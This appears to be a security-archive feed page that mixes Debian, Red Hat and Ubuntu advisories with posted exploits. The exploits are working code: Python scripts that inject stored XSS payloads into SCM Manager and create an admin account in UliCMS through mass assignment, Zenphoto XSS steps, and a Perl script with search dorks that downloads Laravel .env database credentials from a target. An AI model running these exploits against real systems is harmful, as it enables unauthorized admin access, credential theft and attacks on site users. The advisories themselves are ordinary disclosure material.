Debian Linux Security Advisory 5413-1 - An issue has been found in sniproxy, a transparent TLS and HTTP layer 4 proxy with SNI support. Due to bad handling of wildcard backend hosts, a crafted HTTP or TLS packet might lead to remote arbitrary code execution.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5413-1                   security@debian.orghttps://www.debian.org/security/                        Thorsten AlteholzMay 26, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : sniproxyCVE ID         : CVE-2023-25076Debian Bug     : 1033752An issue has been found in sniproxy, a transparent TLS and HTTP layer 4proxy with SNI support. Due to bad handling of wildcard backend hosts,a crafted HTTP or TLS packet might lead to remote arbitrary codeexecution.For the stable distribution (bullseye), this problem has been fixed inversion 0.6.0-2+deb11u1.We recommend that you upgrade your sniproxy packages.For the detailed security status of sniproxy please refer toits security tracker page at:https://security-tracker.debian.org/tracker/sniproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwsRMACgkQO1LKKgqv2VRavQgAuKHflNXCnnu4VYTdqVME/Gkm37TyaxmrIaWliakXlQcz56ZIVBAdbko4mUgqaWBleXcSXRNe/D+9I8ugQUSVzWXNXqOcu9Z+nQzlpHpB+wQR/rMrC97Ep00NLcEELevoz20uDf6ufU+AQixYyfthvncwKcj0TFp4G4VcQboB5CocCVhlXvqEtimch/M117hfKEsD5AJWY04vXicmCqZWrtEjKUSNkZkrRKT/7u4DTkYcYgYsPBKCT0vPGf2XpWEP0bJb7vRyrPq5BnoLXJclF/t6CqD4L9MtBP1gwHPrtJQmgYdjyWm7wKvKAKXINGSUIYDZKOw/3EEkzL2tHOSxng===0CH/-----END PGP SIGNATURE-----

Debian Security Advisory 5413-1

SCM Manager versions 1.2 through 1.60 suffer from a persistent cross site scripting vulnerability.

    #!/usr/bin/python3# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)# Google Dork: intitle:"SCM Manager" intext:1.60# Date: 05-25-2023# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)# Vendor Homepage: https://scm-manager.org/# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/# Version: 1.2 <= 1.60# Tested on: Debian based# CVE: CVE-2023-33829# Modulesimport requestsimport argparseimport sys# Main menuparser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')parser.add_argument("-u", "--user", help="Admin user or user with write permissions")parser.add_argument("-p", "--password", help="password of the user")args = parser.parse_args()# Credentialsuser = sys.argv[2]password = sys.argv[4]# Global Variablesmain_url = "http://localhost:8080/scm" # Change URL if its necessaryauth_url = main_url + "/api/rest/authentication/login.json"users = main_url + "/api/rest/users.json"groups = main_url + "/api/rest/groups.json"repos = main_url + "/api/rest/repositories.json"# Create a sessionsession = requests.Session()# Credentials to sendpost_data={  'username': user, # change if you have any other user with write permissions  'password': password # change if you have any other user with write permissions}r = session.post(auth_url, data=post_data)if r.status_code == 200:  print("[+] Authentication successfully")else:  print("[-] Failed to authenticate")  sys.exit(1)new_user={  "name": "newUser",  "displayName": "<img src=x onerror=alert('XSS')>",  "mail": "",  "password": "",  "admin": False,  "active": True,  "type": "xml"}create_user = session.post(users, json=new_user)print("[+] User with XSS Payload created")new_group={  "name": "newGroup",  "description": "<img src=x onerror=alert('XSS')>",  "type": "xml"}create_group = session.post(groups, json=new_group)print("[+] Group with XSS Payload created")new_repo={  "name": "newRepo",  "type": "svn",  "contact": "",  "description": "<img src=x onerror=alert('XSS')>",  "public": False}create_repo = session.post(repos, json=new_repo)print("[+] Repository with XSS Payload created")

SCM Manager 1.60 Cross Site Scripting

Red Hat Security Advisory 2023-3326-01 - Red Hat Advanced Cluster Management for Kubernetes 2.6.6 images. This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Red Hat Advanced Cluster Management 2.6.6 security fixes and container updates  
Advisory ID:       RHSA-2023:3326-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3326  
Issue date:        2023-05-25  
CVE Names:         CVE-2021-26341 CVE-2021-33655 CVE-2021-33656   
                   CVE-2022-1462 CVE-2022-1679 CVE-2022-1789   
                   CVE-2022-2196 CVE-2022-2663 CVE-2022-3028   
                   CVE-2022-3239 CVE-2022-3522 CVE-2022-3524   
                   CVE-2022-3564 CVE-2022-3566 CVE-2022-3567   
                   CVE-2022-3619 CVE-2022-3623 CVE-2022-3625   
                   CVE-2022-3627 CVE-2022-3628 CVE-2022-3707   
                   CVE-2022-3970 CVE-2022-4129 CVE-2022-20141   
                   CVE-2022-25265 CVE-2022-30594 CVE-2022-35252   
                   CVE-2022-36227 CVE-2022-39188 CVE-2022-39189   
                   CVE-2022-41218 CVE-2022-41674 CVE-2022-42703   
                   CVE-2022-42720 CVE-2022-42721 CVE-2022-42722   
                   CVE-2022-43552 CVE-2022-43750 CVE-2022-47929   
                   CVE-2023-0361 CVE-2023-0394 CVE-2023-0461   
                   CVE-2023-1195 CVE-2023-1582 CVE-2023-1999   
                   CVE-2023-22490 CVE-2023-23454 CVE-2023-23946   
                   CVE-2023-25652 CVE-2023-25815 CVE-2023-27535   
                   CVE-2023-28856 CVE-2023-29007 CVE-2023-32313   
                   CVE-2023-32314   
=====================================================================

1. Summary:

Red Hat Advanced Cluster Management for Kubernetes 2.6.6 General  
Availability release images, which fix security issues and update container  
images.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.6.6 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/

Security Fix(es):  
* CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command  
* CVE-2023-32314 vm2: Sandbox Escape  
* CVE-2023-32313 vm2: Inspect Manipulation

3. Solution:

For Red Hat Advanced Cluster Management for Kubernetes, see the following  
documentation for details on how to install the images:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online

4. Bugs fixed (https://bugzilla.redhat.com/):

2187525 - CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command  
2208376 - CVE-2023-32314 vm2: Sandbox Escape  
2208377 - CVE-2023-32313 vm2: Inspect Manipulation

5. References:

https://access.redhat.com/security/cve/CVE-2021-26341  
https://access.redhat.com/security/cve/CVE-2021-33655  
https://access.redhat.com/security/cve/CVE-2021-33656  
https://access.redhat.com/security/cve/CVE-2022-1462  
https://access.redhat.com/security/cve/CVE-2022-1679  
https://access.redhat.com/security/cve/CVE-2022-1789  
https://access.redhat.com/security/cve/CVE-2022-2196  
https://access.redhat.com/security/cve/CVE-2022-2663  
https://access.redhat.com/security/cve/CVE-2022-3028  
https://access.redhat.com/security/cve/CVE-2022-3239  
https://access.redhat.com/security/cve/CVE-2022-3522  
https://access.redhat.com/security/cve/CVE-2022-3524  
https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-3566  
https://access.redhat.com/security/cve/CVE-2022-3567  
https://access.redhat.com/security/cve/CVE-2022-3619  
https://access.redhat.com/security/cve/CVE-2022-3623  
https://access.redhat.com/security/cve/CVE-2022-3625  
https://access.redhat.com/security/cve/CVE-2022-3627  
https://access.redhat.com/security/cve/CVE-2022-3628  
https://access.redhat.com/security/cve/CVE-2022-3707  
https://access.redhat.com/security/cve/CVE-2022-3970  
https://access.redhat.com/security/cve/CVE-2022-4129  
https://access.redhat.com/security/cve/CVE-2022-20141  
https://access.redhat.com/security/cve/CVE-2022-25265  
https://access.redhat.com/security/cve/CVE-2022-30594  
https://access.redhat.com/security/cve/CVE-2022-35252  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2022-39188  
https://access.redhat.com/security/cve/CVE-2022-39189  
https://access.redhat.com/security/cve/CVE-2022-41218  
https://access.redhat.com/security/cve/CVE-2022-41674  
https://access.redhat.com/security/cve/CVE-2022-42703  
https://access.redhat.com/security/cve/CVE-2022-42720  
https://access.redhat.com/security/cve/CVE-2022-42721  
https://access.redhat.com/security/cve/CVE-2022-42722  
https://access.redhat.com/security/cve/CVE-2022-43552  
https://access.redhat.com/security/cve/CVE-2022-43750  
https://access.redhat.com/security/cve/CVE-2022-47929  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-0394  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-1195  
https://access.redhat.com/security/cve/CVE-2023-1582  
https://access.redhat.com/security/cve/CVE-2023-1999  
https://access.redhat.com/security/cve/CVE-2023-22490  
https://access.redhat.com/security/cve/CVE-2023-23454  
https://access.redhat.com/security/cve/CVE-2023-23946  
https://access.redhat.com/security/cve/CVE-2023-25652  
https://access.redhat.com/security/cve/CVE-2023-25815  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/cve/CVE-2023-28856  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/cve/CVE-2023-32313  
https://access.redhat.com/security/cve/CVE-2023-32314  
https://access.redhat.com/security/updates/classification/#critical

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHBqdtzjgjWX9erEAQgPBBAAnba1fjcWKh24XoIxjEsRwYwq2JN7qmIU  
MANW+FQiQX2SxrlS729OKswdcDQbMeGr2S9bnmZutqTTihgS/0DnCEUV4leX2fec  
iX3+umTRrS4S2n1bs6jhMTygTHNFMEm0hRlaif0T35YnLtFDUO82QQVMAuifh0kn  
5Z8n3oHiu5KX8oHQueP2zk9jC1DP2LWcxPZq3X90kYPTYn1bv12N8EcmaiIsQI2L  
I5vXMPLf/SSl22Fzgs/qvFrdpRzwuWl4OATWjdICIZZg4hVrxG/k4pekuPX1QsTE  
7sFOBsDp6i9RW/ZgUG30BI7RI5TZv1x087SI9j5M4PL06ePnYzBeWOPmkD5XeclV  
ScJvCcVQpI4gef0QrsRcfaMaVdYgJa4S6rn0RJddaXY1FsyhDU/61LjEpI/Mu5LC  
GKchpJC+lUGhGWy7r5Nn563VuUwdjKqjvtBdU4UwB/K6GoLF4QYMWOcBlZUBxNfD  
JLVIVj5FgQYNMcV/0KFsL51rlbeTCntp4xH5QbPxt+932E0FlSej5Y1dqTBNX78a  
w0hkqQoBDqjfYK80yvyeRI5X3ZQ4SHJe61ozHVSLa+VhGz5WDrPaHNsFkPM01EsV  
pUhn2d27SA+SRwPE93GG6smk1dHgx6grZCISvRbtqzItoXcDdEb5L94GZx0pIFiF  
nh/78SLF0ZU=  
=P0X2  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3326-01

Ulicms version 2023.1 create administrator user via mass assignment exploit.

    #Exploit Title: Ulicms 2023.1 - create admin user via mass assignment#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:   create admin user via mass assignment#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicunaimport requestsnew_name=input("name: ")new_email=input("email: ")new_pass=input("password: ")url = "http://localhost/dist/admin/index.php"headers = {"Content-Type": "application/x-www-form-urlencoded"}data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="response = requests.post(url, headers=headers, data=data)if response.status_code == 200:    print("Request is success and created new admin account")    else:    print("Request is failure.!!")        #POC video : https://youtu.be/SCkRJzJ0FVk

Ulicms 2023.1 Create Administrator

Red Hat Security Advisory 2023-3325-01 - Multicluster Engine for Kubernetes 2.1.7 images Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds. You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Multicluster Engine for Kubernetes 2.1.7 security fixes and container updates  
Advisory ID:       RHSA-2023:3325-01  
Product:           multicluster engine for Kubernetes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3325  
Issue date:        2023-05-25  
CVE Names:         CVE-2022-2795 CVE-2022-2928 CVE-2022-2929   
                   CVE-2022-36227 CVE-2022-41973 CVE-2023-0361   
                   CVE-2023-27535 CVE-2023-32313 CVE-2023-32314   
=====================================================================

1. Summary:

Multicluster Engine for Kubernetes 2.1.7 General Availability release  
images, which address security issues and update container images.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

Multicluster Engine for Kubernetes 2.1.7 images

Multicluster engine for Kubernetes provides the foundational components  
that are necessary for the centralized management of multiple  
Kubernetes-based clusters across data centers, public clouds, and private  
clouds.

You can use the engine to create new Red Hat OpenShift Container Platform  
clusters or to bring existing Kubernetes-based clusters under management by  
importing them. After the clusters are managed, you can use the APIs that  
are provided by the engine to distribute configuration based on placement  
policy.

Security fix(es):  
* CVE-2023-32314 vm2: Sandbox Escape  
* CVE-2023-32313 vm2: Inspect Manipulation

3. Solution:

For multicluster engine for Kubernetes, see the following documentation for  
details on how to install the images:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html-single/multicluster_engine_operator/index#installing-while-connected-online

4. Bugs fixed (https://bugzilla.redhat.com/):

2208376 - CVE-2023-32314 vm2: Sandbox Escape  
2208377 - CVE-2023-32313 vm2: Inspect Manipulation

5. References:

https://access.redhat.com/security/cve/CVE-2022-2795  
https://access.redhat.com/security/cve/CVE-2022-2928  
https://access.redhat.com/security/cve/CVE-2022-2929  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2022-41973  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/cve/CVE-2023-32313  
https://access.redhat.com/security/cve/CVE-2023-32314  
https://access.redhat.com/security/updates/classification/#critical

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG/BttzjgjWX9erEAQjYsQ/9H3JpPTOvwIPWOwCwcuGu8M5yONlUfHG+  
QmK/UaVkA9bTv+OrQQ2Idte+JIAnEI6J5x6Hs5xu14loLY5deqsj4enzk3v+KLal  
RAN3yxHNBtfdI6aYqgVCtzfGZAWw3lvf5D+unHvNGRb66FXK71BYjRqC4uzGY2OS  
5hrYOhJBB7jdcqaQnnA/7aqghZxUgp2drDDszuxidCZj9p1BtRs4R64bdZA1bhda  
xf7iTnlTmgw/g9Gfv1vaKWSh91ajxXETURzgubZ9Pd8VmxycvBfMo3NlYPb/nPv2  
41EYuwSlGBAChCony1nW/nrm0eRvJpBLiuup5G/Z0EZ6dn/kgRgHLv/pKtnpGaVr  
vSLlSaBBEKdv7u4BmzJ547ULEjGu8ZDOPjFheZvZnNbnluIKdwJOH+hPnqfxNPsd  
0zh02tDhzrlJqanC8gTz97TTAakQgNDgMDMn/syi67Gs/o+XDSDF9ypFFxDWjJER  
de1QmjOlbxQCQRAqKfM2cvkZdLBJ3qLeNWjJE+nGs7jeg0qD3KlD5npHN+vWWmO1  
nLCEz4Awd3WXzY3TmkBMv3Sy6RuHWYxm8MyYfrXZA44FEnIspEtx87e2RSNT50jI  
Fan26hcaiJNmGutIb8GEmKzf9EzBP/tuITzBSQNpcwzlmVbV/CtP6j1vkvBwMsJg  
PnzJEccKKHs=  
=o7LV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3325-01

Zenphoto version 1.6 suffers from multiple persistent cross site scripting vulnerabilities.

    Exploit Title: Zenphoto 1.6 - Multiple stored XSSApplication: Zenphoto-1.6 xss pocVersion: 1.6 Bugs:  XSSTechnology: PHPVendor URL: https://www.zenphoto.org/news/zenphoto-1.6/Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zipDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. create new album 2. write Album Description : <iframe src="https://14.rs"></iframe> 3. save and view album  http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/=====================================================###XSS-2###steps: 1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)2.change postal code  as <script>alert(4)</script>3.if admin user information import as html , xss will triggerpoc video : https://youtu.be/JKdC980ZbLY

Zenphoto 1.6 Cross Site Scripting

Red Hat Security Advisory 2023-3323-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: go-toolset-1.19 and go-toolset-1.19-golang security update  
Advisory ID:       RHSA-2023:3323-01  
Product:           Red Hat Developer Tools  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3323  
Issue date:        2023-05-25  
CVE Names:         CVE-2023-24537 CVE-2023-24538 CVE-2023-24539   
                   CVE-2023-24540 CVE-2023-29400   
=====================================================================

1. Summary:

An update for go-toolset-1.19 and go-toolset-1.19-golang is now available  
for Red Hat Developer Tools.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Developer Tools for Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64le, s390x, x86_64  
Red Hat Developer Tools for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64

3. Description:

Go Toolset provides the Go programming language tools and libraries. Go is  
alternatively known as golang.

Security Fix(es):

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

* golang: go/parser: Infinite loop in parsing (CVE-2023-24537)

* golang: html/template: backticks not treated as string delimiters  
(CVE-2023-24538)

* golang: html/template: improper sanitization of CSS values  
(CVE-2023-24539)

* golang: html/template: improper handling of empty HTML attributes  
(CVE-2023-29400)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2184481 - CVE-2023-24538 golang: html/template: backticks not treated as string delimiters  
2184484 - CVE-2023-24537 golang: go/parser: Infinite loop in parsing  
2196026 - CVE-2023-24539 golang: html/template: improper sanitization of CSS values  
2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace  
2196029 - CVE-2023-29400 golang: html/template: improper handling of empty HTML attributes

6. Package List:

Red Hat Developer Tools for Red Hat Enterprise Linux Server (v. 7):

Source:  
go-toolset-1.19-1.19.9-1.el7_9.src.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.src.rpm

noarch:  
go-toolset-1.19-golang-docs-1.19.9-1.el7_9.noarch.rpm

ppc64le:  
go-toolset-1.19-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.ppc64le.rpm

s390x:  
go-toolset-1.19-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.s390x.rpm

x86_64:  
go-toolset-1.19-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-race-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.x86_64.rpm

Red Hat Developer Tools for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
go-toolset-1.19-1.19.9-1.el7_9.src.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.src.rpm

noarch:  
go-toolset-1.19-golang-docs-1.19.9-1.el7_9.noarch.rpm

x86_64:  
go-toolset-1.19-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-race-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24537  
https://access.redhat.com/security/cve/CVE-2023-24538  
https://access.redhat.com/security/cve/CVE-2023-24539  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/cve/CVE-2023-29400  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG9tRtzjgjWX9erEAQjCSA/+JzEIQeKBJmyOnfKV5sZx20c+nw1vz1R0  
pqsw0rwfEvjBlIo71E4PtBPiwdN6rqaAkrxZ0R95HJC4potAiaF8Sw3ylSEO72Bc  
ODhyHA8WNBR800bxJmLJIbRiOmdS1iDXAhWKAa7CmoHPnQ9o8m6DMOKUkg78v1vb  
fOOgl842d0AAEq25RGj1OjA0SdRYYBe4SFUrZuurB5UZXuaEO6bpFqJW0TJ7bzNQ  
k8DOvNTwGSguOiAlBcbKbX8RDGkRyLMVqBBxHbfY1mCKalDma4GvlHnr680qAmtP  
isN9FEK/DhqVW09Lymvw35ok3ZW95+aKdi3jWXbVPwBCa1AXmFadNWUbVgZ17vg8  
frksYbVj8MdWgVb0k1f5HOMiDhQ/oygo4U0MOnUM8pJYcwuQ9SJbU9wTl5BfpBsX  
jIKwzE1krbTXD77yxaxNXH4EqMEM83F61MqKFPq3hd/BQSS9fXXDaEput+RfCZxX  
ZPrBCNCQo/ity03T4S6+5dFUL9M4VHGXabLhe35YWIfhgOp3DS975GaK1HlZpmvW  
UailJg3zz9i5ouZjoYyXywUnAr9r2PdwD+AE7X8CTE2rwi+f/naqDaTFFQbpsbO9  
sFOlrloPeUDw2cbxXEU6HpGm30+SFsu6gA8vLvdMDgj+gqp5T8Yu24zxSQRRZxsL  
VikMaSs72G4=  
=e8Eb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3323-01

Laravel version 10.11 suffers from database disclosure and information leakage vulnerabilities.

====================================================================================================================================  
| # Title     : Laravel 10.11 Information Disclosure MySQL Credential Disclosure Vulnerability                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://laravel.com/                                                                                               |    
| # Dork      : db_password filetype:env                                                                                           |  
                "Whoops! There was an error."                                                                                      |  
====================================================================================================================================

note : 

[+] 1 : 

 Laravel's default .env file contains some common configuration values that may differ based on whether your application   
is running locally or on a production web server. These values are then retrieved from various Laravel configuration files   
within the config directory using Laravel's env function.

[+] 2 :  This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc

[+] Poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use Payload : /.env = ( Depending on the server's protection, the result of viewing the file is either direct viewing or downloading the file Or not give you anything )

[+] https://127.0.0.1/lala/.env 

====================================================================================================================================  
| # Title     : Laravel 10.11 sensitive information disclosure Vulnerability                                                       |  
====================================================================================================================================

poc : 

[+]  This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc

[+]  Dorking İn Google Or Other Search Enggine .

[+]  https://127.0.0.1/lalaland/categorie/avant_apres/

[+]  https://youtu.be/tz_w563Nyac  

====================================================================================================================================  
| # Title     : Laravel 10.11 Database Disclosure Exploit                                                                          |  
====================================================================================================================================

poc :

[-] Download the configuration file:

    The following Perl exploit will attempt to download the .env file  
    The .env file contains some common configuration values and connection information to the script database  
    Through the code you can control where to save the downloaded file .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
# Author : indoushka

use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] Laravel from Version 1.0 to 9.47.0 Database Disclosure [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[+] Author : indoushka \n\n";  
print "[-] How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/.env \n";  
print "[+] usage2 : perl $0 localhost /.env \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File=".env";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/.env");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/.env\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

Laravel 10.11 Database Disclosure / Information Disclosure

Ubuntu Security Notice 6054-2 - USN-6054-1 fixed a vulnerability in Django. This update provides the corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. Moataz Al-Sharida and nawaik discovered that Django incorrectly handled uploading multiple files using one form field. A remote attacker could possibly use this issue to bypass certain validations.

==========================================================================  
Ubuntu Security Notice USN-6054-2  
May 25, 2023

python-django vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

A Django hardening measure could be bypassed.

Software Description:  
- python-django: High-level Python web development framework

Details:

USN-6054-1 fixed a vulnerability in Django. This update provides  
the corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM.

Original advisory details:

 Moataz Al-Sharida and nawaik discovered that Django incorrectly handled  
